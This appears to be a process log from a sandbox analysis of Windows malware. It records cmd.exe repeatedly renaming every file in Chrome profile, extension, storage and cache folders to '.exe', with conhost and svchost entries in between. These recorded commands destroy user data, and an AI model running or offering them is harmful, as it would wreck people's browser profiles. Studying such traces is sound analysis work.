C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\my\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ne\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\nl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\no\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\pa\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\pl\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\pt_BR\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\pt_PT\*.*" "*.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ro\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ru\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\si\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sv\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\sw\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ta\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\te\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\th\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\tr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\uk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\ur\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\vi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\zh_CN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\zh_HK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\zh_TW\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.78.1_0\_locales\zu\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome\*.*" "*.exe"

C:\Windows\System32\cmd.exe

